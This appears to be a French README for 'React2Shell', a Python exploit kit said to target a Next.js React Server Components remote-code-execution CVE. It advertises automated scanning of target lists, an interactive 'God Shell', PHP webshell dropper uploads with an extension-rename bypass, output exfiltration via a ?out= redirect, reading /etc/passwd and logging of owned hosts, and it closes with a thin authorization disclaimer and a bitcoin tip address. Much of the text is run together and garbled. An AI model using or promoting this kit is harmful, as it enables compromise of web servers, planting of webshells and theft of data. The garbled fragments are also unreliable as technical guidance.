
React2Shell - Exploit RCE CVE-2025-66478
Ce kit Python exploite la pollution de prototype des React Server Components (RSC) de Next.js + la chaîne de gadgets React.lazy(-1) pour un accès RCE complet, incluant un shell interactif, un téléversement de fichier (dropper PHP webshell), et une exfiltration via ?out=.

Détection et exploitation automatisées des applications Next.js vulnérables (ex : target.com). Obtient un shell uid=33(www-data) avec :
child_process.execSync → /exploit?out=UIDread /etc/passwd), téléversements{\"0\":null} → 500 E{\"digest confirme le gestionnaire RSC.Location: /exploit?out=sortie_idexecSync(cmd) → exfiltration stdout/stderr via redirection.upload_txt local.txt remote.php → contournement écriture+renommage.pip3 install aiohttppython3 main.pyhttp://target.com ou targets.txt1=Détecter 2=PoC(id) 3=Personnalisé 4=God Shell [4]Enchaîné : echo \"http://target\n4\" | python3 main.py
Commandes du God Shell :
upload <local.php> <remote/shell.php> # Téléversement PHP direct
upload_txt <local> <remote/shell.php> # Contournement TXT→renommage
upload_bin <local> <remote> # Binaires (chmod plus tard)
help / exit
id / cat /etc/passwd / ls -la /var/www/
React2Shell_Owned/pwned_YYYYMMDD_HHMMSS.txt[VULNÉRABLE] → uid=33(www-data)aiohttp
pip install aiohttp
Pour des tests d'intrusion autorisés et à des fins éducatives uniquement (l'utilisateur a confirmé l'autorisation selon les CGU). Toute utilisation non autorisée est illégale contraire à l'éthique.
Offrez-moi un café :
₿ BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh
©2025 khadafigans